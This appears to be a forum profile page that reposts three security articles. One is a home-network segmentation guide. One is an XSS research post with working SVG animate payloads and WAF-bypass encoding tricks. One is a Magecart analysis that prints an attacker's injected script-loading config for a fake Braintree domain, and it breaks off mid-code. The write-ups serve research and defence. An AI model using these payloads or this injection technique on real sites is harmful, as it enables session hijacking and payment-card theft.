-
Posts
18664 -
Joined
-
Last visited
-
Days Won
683
Everything posted by Nytro
-
Home Network Design – Part 2 Ethan Robish // Why Segment Your Network? Here’s a quick recap from Part 1. A typical home network is flat. This means that all devices are connected to the same router and are on the same subnet. Each device can communicate with every other with no restrictions at the network level. This network’s first line of defense is a consumer router[1][2]. It also has your smart doorbell[3], door lock[4][5][6], lightbulb[7], and all your other IoT devices[8][9]. Not to mention all your PCs, tablets, and smartphones, which you, of course, keep patched with the latest security updates[10] right? Windows 7 is now unsupported and most mobile devices only receive 2-3 years of OS and security updates at the most. What about devices brought over by guests? Do you make sure those are all up to date as well? Once an attacker has a foothold on your network, how hard would it be for them to spread to your other devices? Many router vulnerabilities are available for an attacker to exploit from inside the router’s firewall. Your router is the gateway for all your other devices’ internet traffic, opening you up to rogue DNS, rogue routes, or even TLS stripping man-in-the-middle attacks. Some of the most devastating ransomware attacks[11] have spread by exploiting vulnerabilities in services like SMB or through password authentication to accessible systems on the same network segment. Speaking of passwords, yours are all at least 15 characters (preferably random) right[12]? Ransomware is also known to try default or common passwords and even attempt brute forcing[13]. You might as well make sure that you have multi-factor authentication enabled where you can because malware can also steal passwords from your browser and email[14]. [1]: https://threatpost.com/threatlist-83-of-routers-contain-vulnerable-code/137966/ [2]: https://routersecurity.org/bugs.php [3]: https://threatpost.com/ring-plagued-security-issues-hacks/151263/ [4]: https://www.cnet.com/news/smart-lock-has-a-security-vulnerability-that-leaves-homes-open-for-attacks/ [5]: https://techcrunch.com/2019/07/02/smart-home-hub-flaws-unlock-doors/ [6]: https://threatpost.com/smart-lock-turns-out-to-be-not-so-smart-or-secure/146091/ [7]: https://www.theverge.com/2020/2/5/21123491/philips-hue-bulb-hack-hub-firmware-patch-update [8]: https://threatpost.com/half-iot-devices-vulnerable-severe-attacks/153609/ [9]: https://threatpost.com/?s=iot [10]: https://www.it.ucla.edu/security/resources/security-best-practices/top-10-it-security-recommendations [11]: https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/ [12]: https://www.blackhillsinfosec.com/?s=password [13]: https://www.zdnet.com/article/ransomware-attacks-weak-passwords-are-now-your-biggest-risk/ [14]: https://www.zdnet.com/article/ftcode-ransomware-is-now-armed-with-browser-email-password-stealing-features/ Segmentation means separating your devices so that they cannot freely communicate with each other. This may be completely isolating them or only allowing certain traffic but blocking everything else. How does segmentation help combat the issues outlined above? The first thing to realize is that no one is perfect. Even if you are security conscious and actively work to fix issues, there are always going to be security vulnerabilities and weaknesses. You may be running IoT devices that you have no control over whether the manufacturer patches security issues. You may own mobile devices that no longer receive updates. You may have devices with default passwords set simply because you didn’t realize there was a default account added. Once we realize that we can’t be perfect, the idea of having different layers of security and practicing defense in depth starts making sense. https://en.wikipedia.org/wiki/Defense_in_depth_(computing) You likely already have some layers implemented. Your edge firewall on your home router keeps random inbound traffic out. Your personal devices may have software firewalls activated. Your devices may have authentication enforced to prevent anonymous usage. You could have anti-virus software that keeps common and known malware from infecting your system. Each of these layers is fallible, but adding more layers makes it harder and harder for an attacker to craft an exploit path that bypasses all of them. They can also limit the damage should one layer be compromised. For instance, say an attacker somehow broke through your edge firewall. Your security layers could prevent or delay further compromise into other devices. Network segmentation is an excellent layer to add to your defense in depth strategy. Approaches To Network Segmentation You can think of segmentation on a linear scale. On one end of the scale, every device is on the same network. This is the same as no segmentation, but everything is interoperable (including malware). You don’t need instructions on setting this up because it is the default in every networking device on the planet. This is like a bowl of candy where every piece can freely move around and touch all the others. On the other end of the scale, every device is completely isolated from each other. This is similar to giving every device a public IP address and making it available on the internet. This isn’t as crazy as it sounds as IPv6 makes this completely possible and it forces you to treat everything as untrusted. Everything has firewall rules only allowing certain services to be accessed. The services that are accessible enforce authentication and encryption (likely SSO and TLS). This is similar to a box of chocolate where every piece is isolated from the others. Notably Google has implemented this in what they call BeyondCorp. https://cloud.google.com/beyondcorp https://security.googleblog.com/2019/06/how-google-adopted-beyondcorp.html https://thenewstack.io/beyondcorp-google-ditched-virtual-private-networking-internal-applications/ Google’s BeyondCorp has research papers for guidance and solutions to craft your own implementation, provided you use Google’s cloud for everything. Cloudflare created a product that operates on a similar idea but can be used anywhere, rather than requiring you to migrate everything into a cloud environment. This is a paid product, but the free tier may well work for home networks. https://blog.cloudflare.com/introducing-cloudflare-access/ https://blog.cloudflare.com/cloudflare-access-now-teams-of-any-size-can-turn-off-their-vpn/ https://teams.cloudflare.com/access/index.html As I mentioned, network segmentation is a scale. This post will fall somewhere in the middle between these extremes. Keeping with the candy analogies, our goal is to group similar pieces together into separate containers. The challenge is to determine the best balance between simplicity, interoperability, and security for you. Network Segmentation Concepts In order to get segmentation, you need your packets to traverse a device that can apply some sort of filtering. Much of my confusion when setting up my own network stemmed from the fact that this happens at different layers of the OSI model, with different concepts overlapping or working together. If these concepts are new to you, see the “Terminology” section of my previous posts: https://www.blackhillsinfosec.com/home-network-design-part-1 Switch – A managed switch can implement separate LAN segments through software configuration. These are called virtual LANs or VLANs. Managed switches can have rules that limit traffic between different ethernet ports. These are called port Access Control Lists (ACLs). Layer 3 switches also have VLAN ACLs that filter traffic between VLANs (VACLs). These are basically limited firewall rules implemented in switches. They aren’t as flexible as software firewalls and only apply to OSI layers 3 and below, but they have the benefit of better performance compared to a firewall. Router – Routers must have routes configured, either automatically through a route discovery protocol or statically set. Routes are used in order to allow IP traffic to pass between different network subnets. Conversely, if a route is not present then no traffic will flow between those subnets. You might be tempted to call this a security feature and use it as such, but I advise against that. Routers will often automatically create routes between networks and there are entire protocols devoted to learning and sharing routes between routers (e.g. OSPF, EIGRP, RIP). If you rely on the absence of a rule for security you might find your router has betrayed you by adding it for you and breaking your deliberate segmentation. Firewall – This is the most flexible of all the options and can operate on OSI layers 3 through 7. But in most networks, this means that packets will have to pass through both switch hardware and routing hardware before making it to a CPU which applies the firewall filtering. Switches have specialized hardware and process packets extremely quickly. Any time a packet can’t be handled by a switch alone it will add extra resource load on the next device and add extra latency. Without the decisions made by switches, a firewall’s CPU could easily become overloaded on a large network. Even a single physical device that functions as a switch, router, and firewall all wrapped up in one will most likely have specialized hardware inside for switching. As a wise uncle once said, This doesn’t even cover all the available options. In addition, there is wireless client isolation, virtual routing and forwarding (VRF), and along with others that I don’t even know about. Finding the right combination of these concepts is a balance between your configuration needs, your available equipment, and your throughput requirements. What I have above should get you through this post but if you are interested, here are some further resources: https://geek-university.com/ccna/cisco-ccna-online-course/ http://www.firewall.cx/networking-topics.html https://www.paloaltonetworks.com/cyberpedia/what-is-network-segmentation https://en.wikipedia.org/wiki/Network_segmentation http://www.linfo.org/network_segment.html https://www.cyber.gov.au/publications/implementing-network-segmentation-and-segregation Deciding What To Put In Each Segment Devices on the same network segment will be able to talk to each other freely with no (network) firewall restrictions, or potentially only the ACLs which your managed switch can enforce. Additionally, broadcast and multicast traffic will be available to all the devices on the segment. Whereas, devices on different segments can talk to each other using unicast traffic within the bounds of router routes and firewall rules. If you are security-minded (a likely assumption since you’re reading this blog) then you might be tempted to isolate each of your devices and open firewall rules one by one as needed. Or to create a multitude of segments with a few devices in each. This is a decent approach if you have the resources and time to dedicate to this. But I’ll give you the benefit of my experience as to why I think simpler is better. As you get more complex, you increase the setup and maintenance burden. Not only does this take more time and energy, but you also run the risk of losing the security benefits you were after due to creating something more complex than what you currently understand. There is a reason this post is written in 2020 while part one of this series was in 2017. After I wrote part one I grouped my 21 devices into 10 different types, created a spreadsheet, and assigned them into 8 segments. Even then I realized this was too many and ended up implementing 6 segments. I spent too much time trying to get devices to work together, pruning and merging certain segments over time in frustration. The final straw was after I had visitors connected to my guest wireless network and noticed that the dynamic IP addresses they had gotten didn’t look right. I investigated and discovered that somewhere along the way I had completely blown the separation I thought I had between my home devices and guest devices. At this point, I decided to tear everything down and start from scratch: to build something up that I could fully understand rather than trying to patch up a design that was overly complex to begin with. Segmentation Approaches I came up with two ways to approach network segmentation: Top-Down: Go from one segment to two (then three, etc) by thinking about all my devices and deciding which ones I cared most about and wanted to separate from everything else. This could simply be wanting all your own devices separate from your guests’ devices. Or it could be wanting your personal computers separate from your media and IoT devices. Bottom-Up: Start with every device separate and think about how to group them together based on similar resource access requirements. You will likely find a hybrid of the two approaches most useful. At the end of the top-down approach you can use the bottom-approach to continue splitting up your biggest groups and help develop firewall rules. And if you start with the bottom-up approach, you will still likely want to make some high-level group decisions like splitting off your work and guest segments. The primary reason we are implementing network segmentation is for security. It is easy to get lost in the weeds so one piece of advice is to keep the end goal of compartmentalizing services and data in mind. Top-Down Approach Start with all of your devices in one group and identify groups to break out based on your needs. It is called top-down because you are going from general (one group) to specific (multiple groups). This is the approach I took most recently and ended up with a network that was simpler to configure and simpler to manage. I recommend taking this approach to start with. List out all client devices. Decide which devices you’ll need to segment at a minimum. For instance, work devices and guest devices must be on their own segments. Group your devices under each category. Work Guest Home You can start with these segments, or you can divide them up further if you can easily identify additional groups of devices. For instance, you might decide that you have several Home devices that only need internet access and nothing else. You could choose to connect these to your Guest segment, or you could create a separate segment called Internet Only. This approach is meant for simplicity and if you start getting too granular you will benefit from reading through the considerations needed for the bottom-up approach. Example Let’s walk through a real-world example where the primary goals are to separate work devices from home devices and provide a guest network. You can do this a number of ways. I’ll use a spreadsheet, but you can use pen and paper, lists in a document, or a kanban (e.g. Trello) board. List out all client devices in the first column. In the first row create a new column for each of your must-have segments (e.g. Work, Guest). Mark your devices in each segment. Device Home Work Guest NAS x Desktop x ThinkPad x MacBook 13″ x MacBook 15″ x Surface x iPhone 8 x Pixel 3 x Galaxy S4 x iPhone SE x Kindle Fire x Xbox One x Shield TV x Brother Printer x HD HomeRun x In this case, I’m reserving the Guest group for anyone who visits my house and brings a phone or laptop of their own. If I get any additional work devices in the future, those will also go in the Workgroup. I could take this further if I wanted to. Let’s say that some of my devices don’t need access to anything local and that they only ever talk to the internet. I’ve also decided to put my home server into its own group. Device Home Work Server Internet Only Guest NAS x Desktop x ThinkPad x MacBook 13″ x MacBook 15″ x Surface x iPhone 8 x Pixel 3 x Galaxy S4 x iPhone SE x Kindle Fire x Xbox One x Android TV x Brother Printer x HD HomeRun x Remember that we have several tools at our disposal to limit traffic: VLANs Port ACLs Wireless Isolation Firewall Rules If I keep this in mind, I can start seeing that I’ll need to put in firewall rules to allow each group access to certain services on my home server. While I could consider connecting my Internet Only devices to my Guest network and implement wireless client isolation, I would prefer to keep them separate. Sharing the network password with other devices introduces a risk of eavesdropping. Furthermore, Windows 10 has been known to share wireless credentials with the user’s contact list, meaning your guest wireless network key could make it into the hands of your friends’ friends, who you do not know. Bottom-Up Approach Start with each of your devices in its own group. You will have as many groups as you have devices. Then start grouping devices together based on specific needs until you can no longer justify merging groups together. I took the bottom-up approach during my first attempt at segmenting my network. My advice if you decide to take this approach is: Be honest about the skills you have and the amount of time and frustration you are willing to put up with in order to learn what you don’t know. Keep grouping an extra step and decide which device groups you would merge together next. This can save you some trouble if you run into unexpected issues. You may even decide that you like the groups you end up with here better and use them. My steps for the bottom-up approach are: List out all client devices. Mark devices which will run a server that needs to be accessed by other devices. Mark devices for which local auto-discovery is necessary to function. If you have the option of inputting the IP address manually in your application and are willing to do that, there’s no need to have the auto-discovery features. For each device, you identified as a server, go through all your other devices and determine which ones will need access. For each device you identified with auto-discovery, go through all your other devices and determine which ones need to auto-discover it. A Quick Note About Service Discovery And Multicast DNS Printers, Chromecasts, and home automation devices often use multicast traffic to perform service auto-discovery, specifically, multicast DNS (mDNS), though other multicast-based protocols are sometimes used. Multicast traffic does not cross network segments (technically broadcast domains) without extra configuration (IGMP) and the multicast used by mDNS requires a repeater service in order to cross network segments. For example, I have a network TV tuner that requires an app to connect and watch TV. The app will automatically detect the tuner with no way to manually enter its IP address. It relies on multicast traffic which means I have to keep it on the same network as all the devices I expect to use it with. Other examples of devices you might run into are screen mirroring (e.g. Chromecast), speakers (e.g. Sonos), file shares (e.g. Apple Time Capsule), and printing. Some devices may appear to use auto-discovery but in reality, use a cloud service to facilitate discovery and management. If you’re not sure if your device relies on local auto-discovery, disconnect your home’s internet connection and try to locate the device in your client application (you may have to remove it first if it was already saved). If it finds it and can connect there’s a good chance it is using some form of auto-discovery. You can also fire up Wireshark and look for mDNS packets (filter: mdns) or use a tool that speaks mDNS to query for services on your network. In this post, I am choosing the simpler route that requires multicast devices to be on the same network segment, but at the end are some options if you’d like to research a different solution for your specific network setup. Example You can skip this approach if you’re happy with the top-down exercise. But the bottom-up approach can help you create further segmentation and gain a more intimate knowledge of your network devices and services and how they interact, which will help you when it comes time to create firewall rules. Again, I’ll use a spreadsheet but you can do this with pen and paper, lists in a document, or a kanban (e.g. Trello) board. List out all client devices in the first column. Also, create an empty Server column and an empty Auto-Discovery column. Mark all your devices in the Server column which are hosting services that your other devices will need to access. For all your servers, mark in the Auto-discovery column where auto-discovery functionality is required. Device Server Auto-discovery NAS x Desktop ThinkPad MacBook 13″ MacBook 15″ Surface iPhone 8 Pixel 3 Galaxy S4 iPhone SE Kindle Fire Xbox One Shield TV x x Brother Printer x HD HomeRun x x In this case, I have 4 devices which are classified as servers on my home network. Of these, only 2 have auto-discovery as a mandatory feature. Auto-discovery would be nice for adding printers, but considering I can manually add the location of a printer and once it’s set up I don’t have to worry about it again I’m fine neutering the auto-discovery feature. Next, we’re going to expand our table. For every server you marked, make a new column for each service that needs to run. Pay attention here as you might have multiple services hosted on the same system. For instance, my NAS hosts a media server, a fileshare, and a DNS server from the same server so I will make a new column for each of these services. For any services which require auto-discovery, mark the column with (auto). Here’s what the table looks like now. Device Server Auto-Discovery Media Fileshare DNS Printing TV Tuner (auto) Casting (auto) NAS x Desktop ThinkPad MacBook 13″ MacBook 15″ Surface iPhone 8 Pixel 3 Galaxy S4 iPhone SE Kindle Fire Xbox One Shield TV x x Brother Printer x HD HomeRun x x Next, go through each service and mark which devices will require access to that service. I used dashes to indicate the server hosting the service. Device Media Fileshare DNS Printing TV Tuner (auto) Casting (auto) NAS – – – Desktop x x ThinkPad x x MacBook 13″ x x x x x MacBook 15″ x x x x x x Surface x x x x x iPhone 8 x x x x Pixel 3 x x x Galaxy S4 x x iPhone SE x x Kindle Fire x x x Xbox One x x x Shield TV x x x – Brother Printer x x – HD HomeRun x – We won’t necessarily use all these columns to determine what groups to put systems in. But they will come in handy when creating firewall rules later. The columns we do care about are the auto-discovery services since those will need to be on the same segment to function correctly. Unless you use an mDNS repeater (described earlier in this article) then any rows with marks in multiple auto-discovery columns means those services will have to be on the same segment. Here’s what I mean from the table above: Even though there are several devices that only need access to one of the services and not the other, the orange highlighted devices (MacBook 15″, Surface, iPhone 😎 need access to both services requiring auto-discovery. This means that the TV Tuner and Casting services (served by the Shield TV and HD HomeRun) will need to be on the same network segment along with those client devices. And that means that any other device that needs access to only one of those services will be on that segment as well. In the event that you have some auto-discovery services that do not have overlapping clients, congratulations! You can put these each in their own network segments and keep their respective clients isolated from each other. At this point we have one network segment for sure that contains all the aforementioned auto-discovery related devices. Since every other service required is unicast we could technically put each of the remaining devices in their own isolated segment and simply manage routes and firewall rules between each of them. This would offer the greatest security in theory. But in practice, this is likely too complex and time-consuming to be worth it. This is why I advised to keep going an extra step and see which devices make sense to group together next. In the table below, you can see how I’ve rearranged and grouped devices based on similarities in services they require access to. This would simplify firewall configuration as instead of having to require rules for individual devices, I could instead configure firewall rules for an entire segment and any devices in that segment which require access to a certain service goes in that segment. For example, below I could have a “Fileshare” segment and a separate “Media” segment and configure the firewall rules accordingly. While this is a good exercise to inform firewall rules, it would be a mistake to stop here. Looking at my groups I can see that I still need to have my ThinkPad work machine isolated which means it can’t go on the same segment as the Desktop and Printer. Furthermore, I think I’d like to have the printer isolated in its own segment. Printers aren’t known for having the best security and by putting in a segment by itself I could implement firewall rules that let all other segments reach into the print spooling port but prevent the printer from reaching out to any of my other devices (save for the DNS and Fileshare services it needs). On the other hand, I’m just fine with putting the Galaxy S4 and iPhone SE together in the same segment and creating separate segments for each of them would be overkill. Accessing Services Across Segments There are a number of reasons you may want to allow devices to communicate across segments. One scenario is having a separate guest network but you still want to give them access to specific services on a different segment. First, a warning: you don’t know if the devices your guests bring over are already infected with malware or what they will do once connected to your network. Letting them connect to any of your own devices is a risk. That said, here are some options for dealing with these issues. Just say no. Apologize and tell your guests that printing, casting, etc doesn’t work from your guest network. Add firewall rules that allow the service you want to make available. This works well for unicast traffic but not for multicast traffic. It does mean you will have to manually configure the client to connect by giving it an IP address. You can have your printer, file share, DNS server, etc on a separate segment from your guest network, but you can add an “allow” firewall rule from the guest network to the IP and port of the service you want available. I do this for my local Pi-Hole DNS server since I want my guests to also have the ad-blocking capability. You should set up authentication on the services so that guests can only access resources you allow them to. For example, if you make a file server available for your guests you don’t want them to have read and write access to all your private documents or backups. Privacy concerns aside, that’s a recipe for disaster if a cryptolocker happens to hitch a ride onto your network on your guest’s device. Set up Guest mode on the Chromecast. This is a feature specific to Chromecasts, though you can check your own device’s documentation to see if it has a similar feature. https://support.google.com/chromecast/answer/6109286?hl=en Use Google Cloud Print. If your printer supports it, you can tie a printer to your Google account and share access with users without being on the same network. https://www.google.com/cloudprint/learn/ https://support.google.com/cloudprint/answer/2541899 Configure multicast routing with IGMP. This does not help for mDNS but can help for other multicast protocols like Simple Service Discovery Protocol (SSDP). Use an mDNS repeater. Some networking equipment has this feature built-in. If yours doesn’t, you have an option of setting up a Linux server that straddles VLANs and runs an mDNS repeater daemon. If you are purchasing new hardware, be sure your specific model supports this feature. Ubiquiti products call it “mDNS repeater” or “Enable Multicast DNS”. This appears to enable multicast traffic forwarding across all VLANs however. Cisco products call it “service discovery gateway”. Mikrotik, unfortunately, doesn’t have this feature though it is commonly requested. mdns-repeater is a daemon you can compile and run on Linux. If you want the most lightweight option or want to get it running on your embedded Linux based router (e.g. DD-WRT) then this is an option. http://irq5.io/2011/01/02/mdns-repeater-mdns-across-subnets/ Avahi is a package included in many repositories and includes functionality called a “reflector” that you can enable in your configuration file. https://apple.stackexchange.com/a/132305 http://chrisreinking.com/need-bonjour-across-vlans-set-up-an-avahi-gateway/ Gathering Hardware Once you have a plan for which devices to segment from each other, you’ll need to start thinking about implementation. You’ll need to create an inventory of networking gear you already have and what capabilities it has. At the minimum you’ll need: Firewall and Router (or layer 3 switch). These are most likely going to come in the same device. Managed switch with VLAN capability. This may also come in the same device as the firewall/router, but you may need to get additional ones to add more ports. Enough managed ethernet ports for the number of wired VLANs you want Enough ethernet ports (can be on unmanaged switches) for the number of wired devices you have Wireless Access point capable of creating virtual Access Points with VLAN tags OR enough physical wireless access points for the number of wireless VLANs you want I gave some recommendations on hardware in Part 1 of this series. Further Resources I’m planning at least one more post in this series where I will cover how I implemented the segmentation with my own hardware. I have Mikrotik devices so my configuration will be specific to them, though the concepts should be broadly applicable. If you’re anxious to get going on your own, here are some resources to get you on the right path. https://www.blackhillsinfosec.com/home-network-design-part-1/ Mikrotik https://www.youtube.com/channel/UC_vCR9AyLDxOlexICys6z4w https://forum.mikrotik.com/viewtopic.php?t=143620&sid=b2437441604735dc40d731a73e11d8a0#p706998 Ubiquiti https://www.youtube.com/playlist?list=PL-51DG-VULPqDleeq-Su98Y7IYKJ5iLbA https://www.youtube.com/channel/UCVS6ejD9NLZvjsvhcbiDzjw https://www.troyhunt.com/ubiquiti-all-the-things-how-i-finally-fixed-my-dodgy-wifi/ https://www.troyhunt.com/friends-dont-let-friends-use-dodgy-wifi-introducing-ubiquitis-dream-machine-and-flexhd/ https://scotthelme.co.uk/securing-your-home-network-for-wfh/ Pfsense https://www.youtube.com/user/TheTecknowledge/search?query=pfsense https://securityweekly.com/shows/security-weekly-471-tech-segment-building-a-pfsense-firewall-part-1-the-hardware/ https://www.youtube.com/watch?v=b2w1Ywt081o Community https://www.reddit.com/r/homelab/ https://discord.gg/aHHh3u5 Sursa: https://www.blackhillsinfosec.com/home-network-design-part-2/
-
XSS fun with animated SVG XSS, SVG, WAF, JavaScript • Apr 14, 2020 Recently I have read about a neat idea of bypassing WAF by inserting a JavaScript URL in the middle of the values attribute of the <animate> tag. Most of WAFs can easily extract attributes’ values and then detect malicious payloads inside them – for example: javascript:alert(1). The research is based on the fact that the values attribute may contain multiple values – each separated by a semicolon. As each separated value is treated by an animate tag individually we may mislead the WAF by smuggling our malicious javascript:alert(1) as a middle (or last) argument of the values attribute, e.g.: <animate values="http://safe-url/?;javascript:alert(1);C"> This way some WAFs might be confused and treat the above attribute’s value as a safe URL. The author of this research presented a perfectly working XSS attack vector: <svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://safe-url?;javascript:alert(1);0" /><a id=xss><text x=20 y=20>XSS</text></a> In the following paragraphs I’ll examine different variations of the above approach. Each example contain user-interaction XSS. To pop-up an alert, insert the example code snippets into .html file and click on the 'XSS' text. Let’s make it shorter Before we begin we need to understand the relation between values and keyTimes attributes. Let’s take a peek at the documentation to understand what’s really going on with keyTimes: A semicolon-separated list of time values used to control the pacing of the animation. Each time in the list corresponds to a value in the ‘values’ attribute list, and defines when the value is used in the animation function. Each time value in the ‘keyTimes’ list is specified as a floating point value between 0 and 1 (inclusive), representing a proportional offset into the simple duration of the animation element. (…) For linear and spline animation, the first time value in the list must be 0, and the last time value in the list must be 1. The key time associated with each value defines when the value is set; values are interpolated between the key times. To better understand its behavior we will create an animation of a sliding circle: <svg viewBox="0 0 120 25" xmlns="http://www.w3.org/2000/svg"> <circle cx="10" cy="10" r="10"> <animate attributeName="cx" dur=5s repeatCount=indefinite values="0 ; 80 ; 120 " keyTimes="0; 0.5; 1"/> </circle> </svg> In the above example two animations occur. The circle slides from 0 to 80 and then from 80 to 120. The more we decrease the middle keyTimes attribute (the former value is set to 0.5), the faster the first part of the animation is. When the value, however, is decreased down to 0, the first part of the animation is omitted and the circle starts sliding from 80 to 120. This is exactly what we need: <svg viewBox="0 0 120 25" xmlns="http://www.w3.org/2000/svg"> <circle cx="10" cy="10" r="10"> <animate attributeName="cx" dur=5s repeatCount=indefinite values="0 ; 80 ; 120 " keyTimes="0; 0; 1"/> </circle> </svg> We want to make sure that the second part of the animation is always shown (while the first is always omitted). To make that happen two additional attributes are set: repeatCount = indefinite – which tells the animation to keep going, dur = 5s – duration time (any value will suffice). Let us have a quick peek then into the documentation and notice that these two attributes are redundant: If the animation does not have a ‘dur’ attribute, the simple duration is indefinite. Instead of indefinitely repeating a 5s animation, we may create an indefinite animation with no repeats. This way we can get rid of a dur attribute (by default it’s set to indefinite value) and we may remove repeatCount afterwards. The very exact idea works for XSS attack vector: values="https://safe-url?;javascript:alert(1);0" keytimes=0;0;1 The first animation won’t occur (so href attribute won’t be set to https://safe-url), whereas the second one will (href will point to javascript:alert(1) and it will remain there indefinitely). This way we may shrink the initial XSS attack vector as below: <svg><animate xlink:href=#xss attributeName=href keyTimes=0;0;1 values="http://isec.pl;javascript:alert(1);X" /><a id=xss><text x=20 y=20>XSS</text></a> Freeze the keyTimes It turns out that keyTimes is not the only attribute which allows us to use a non-first value from the values attribute list. As we want to smuggle our javascript:alert(1) anywhere but not at the beginning, the most obvious solution is to put it at the end. The SVG standard defines an attribute fill. It specifies that the final state of the animation is either the first or the last frame. Let’s move back to our sliding circle example to yet better understand how it works. <svg viewBox="0 0 120 25" xmlns="http://www.w3.org/2000/svg"> <circle cx="10" cy="10" r="10"> <animate attributeName="cx" dur=5s values="0 ; 80 " fill=remove /> </circle> </svg> If attribute fill is set to ‘remove’, upon the end of the animation it moves back to the first frame. The circle slides from 0 to 80 and then moves back to 0 position. <svg viewBox="0 0 120 25" xmlns="http://www.w3.org/2000/svg"> <circle cx="10" cy="10" r="10"> <animate attributeName="cx" dur=5s values="0 ; 80 " fill=freeze /> </circle> </svg> If attribute fill is set to ‘freeze’ the animation keeps the state of the last animation frame. The circle slides from 0 to 80 and it stays where it finished the animation – at 80. This way we can put our javascript:alert(1) as the last element and make sure that it is always displayed when animation finishes. This solution is kind of tricky. Before we hit the last element we need to go through the first one. We cannot just omit it as we did with keyTimes; we can, however, make this first animation frame almost negligible to a human eye by setting a duration of the animation to a very short value, e.g.: 1ms. When animation starts href attribute will be set to http://isec.pl for just 1 millisecond, and then it will remain on javascript:alert(1). <svg><animate xlink:href=#xss attributeName=href fill=freeze dur=1ms values="http://isec.pl;javascript:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a> Other WAF-bypassing tricks The main trick to confuse a WAF is to insert malicious javascript:alert(1) vector as a valid part of a URL. Although values must be separated by a semicolon we are able to easily form a valid URL in which we smuggle our javascript:alert(1) vector: values="http://isec.pl/?a=a;javascript:alert(1)" – as a parameter value values="http://isec.pl/?a[;javascript:alert(1)//]=test" – as a parameter name values="http://isec.pl/?a=a#;javascript:alert(1)" – as a fragment of a hash values="http://;javascript:alert(1);@isec.pl" – as Basic Auth credentials (keyTimes variant) Moreover, we are allowed to HTML-encode any character inside values attribute. This way we may deceive WAF rules even better. <svg><animate xlink:href=#xss attributeName=href fill=freeze dur=1ms values="http://isec.pl;javascript:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a> As HTML-encoding comes in handy we may use extra behavior: some characters are allowed to occur before a javascript: protocol identifier. Every ASCII value from range 01–32 works. E.g.: <svg><animate xlink:href=#xss attributeName=href values="javascript:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a> <svg><animate xlink:href=#xss attributeName=href values="	   javascript:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a> Even more quirky observation suggests that those values don’t need to be HTML-encoded at all (as payload contains non-printable characters, it was base64-encoded for better readability): PHN2Zz48YW5pbWF0ZSB4bGluazpocmVmPSN4c3MgYXR0cmlidXRlTmFtZT1ocmVmICB2YWx1ZXM9IgECAwQFBgcICQ0KCwwNCg4PEBESExQVFhcYGRobHB0eHyBqYXZhc2NyaXB0OmFsZXJ0KDEpIiAvPjxhIGlkPXhzcz48dGV4dCB4PTIwIHk9MjA+WFNTPC90ZXh0PjwvYT4= Summary In this article, we discovered that SVG specification conceals a lots of potential XSS attack vectors. Even a simple attribute values may lead to multiple malicious payloads, which helps bypass WAFs. The presented vectors were tested on both Firefox and Chrome. Paweł Hałdrzyński Sursa: https://blog.isec.pl/xss-fun-with-animated-svg/
-
New Stealth Magecart Attack Bypasses Payment Services Using Iframes by PerimeterX Research TeamApril 14, 2020 Share Using a PCI compliant payment service? Your buyers’ credit card information could still be stolen. PCI compliant payment services hosted within an iframe are not immune from Magecart attacks. Website owners are still responsible for any stolen personally identifiable information (PII) or resulting fines. The PerimeterX research team has uncovered a novel technique for bypassing hosted fields iframe protection, which enables Magecart attackers to skim credit card data while allowing successful payment transactions. This stealthy attack technique gives no indication of compromise to the user or the website admin, enabling the skimming to persist on checkout pages for a long time. The users don’t suspect any malicious activity since the transaction succeeds as expected. In this blog post we examine an active use of this technique that targets websites using the popular payment provider Braintree, a subsidiary of PayPal. Our research team has been actively tracking Inter, a popular digital skimming toolkit used to launch Magecart attacks. Inter is widely known for being sold as a complete digital skimming kit and its ability to easily adapt to many checkout pages on e-commerce sites. Targeting Braintree Hosted Fields Iframe Protection The common method for e-commerce businesses to achieve PCI DSS compliance is by outsourcing the payment process to a third party who is PCI DSS compliant. To achieve this, shops integrate hosted fields, which are third-party payment scripts within an iframe on the checkout page. The iframe which is sourced from the payment provider receives the credit card number, CVV and expiration date in a protected scope, in which the browser enforces a data access restriction as part of its Same Origin Policy (SOP) security mechanism. This is often thought to protect payment forms from Magecart and digital skimming attacks. In order to get around this, Magecart attackers have been using toolkits such as Inter to modify checkout pages and replace the hosted fields with fake checkout forms that they control, from where they can skim credit card numbers. Although similar in look and feel to the real checkout forms, the fake ones do not allow a successful transaction, which can alert the paying customer and the site admin that something is wrong leading them to restore a clean version of the site and remove the infection. This limits the length of time the attack can go unnoticed. This technique has been used for a while, but according to our contact and recent reports of such attacks, it has not been very successful. Users and admins can quickly detect the failed first attempt and the subtle GUI differences and then reload a clean version of the site. The Magecart group we are tracking has been focusing their efforts on breaking iframe protection on websites using popular payment services including Braintree, Worldpay and Stripe. And they have been successful in one instance with a website using Braintree. Bypassing Braintree Iframe Protection Our research led us to the digital skimming toolkit called Saturn, which is a package consisting of the skimmer and the command and control service. This toolkit was used to compromise the Braintree hosted fields payment form on a European e-commerce website. Figure: Admin console for the Saturn toolkit Braintree enables an online seller to achieve PCI DSS compliance under the SAQ A criteria, for “card-not-present merchants that have fully outsourced all cardholder data functions to PCI DSS validated third-party service providers, with no electronic storage, processing, or transmission of any cardholder data on the merchant’s systems or premises.” In order to achieve this, Braintree payment forms and scripts are loaded within an iframe on the payment page, so that the seller does not have any access to read, store or process the credit card information. The transaction payment information is tokenized between the shop and Braintree, while a nonce is set to allow future transactions. Here is an explanation from Braintree’s Get Started guide. Figure: Braintree payment processing flow Figure: Braintree payment processing steps The attacker modified the Braintree scripts on the e-commerce website and created the following multi-step attack resulting in injection of a skimmer script into the hosted iframe while still allowing the transaction to be successful. Step 1: Compromising the Braintree scripts After getting a foothold in the website, the attack starts with changing the Magento Braintree payment script to load the client script from the attacker domain. This seemingly supported change might have been due to an option in the Magento plugin to allow a first-party load of the script or for CDN purposes. The script will now load the modified JavaScript from braintreegateway24[.]com, a domain controlled by the attacker instead of braintreegateway[.]com which is the legitimate protected domain. var config={map:{'*':{braintree:'https://braintreegateway24[.]com/js/braintree-2.32.min.js'}}}; require.config(config);})() Step 2: Bypassing client-side validation The original Braintree client script validates the origin where it was loaded from, but the attack bypasses this by adding its own domain to the regex and whitelist to the modified client script. function(t, e, n) { "use strict"; function i(t, e) { var n, i, r = document.createElement("a"); return r.href = e, i = "https:" === r.protocol ? r.host.replace(/:443$/, "") : "http:" === r.protocol ? r.host.replace(/:80$/, "") : r.host, n = r.protocol + "//" + i, n === t || o.test(t) } var o = 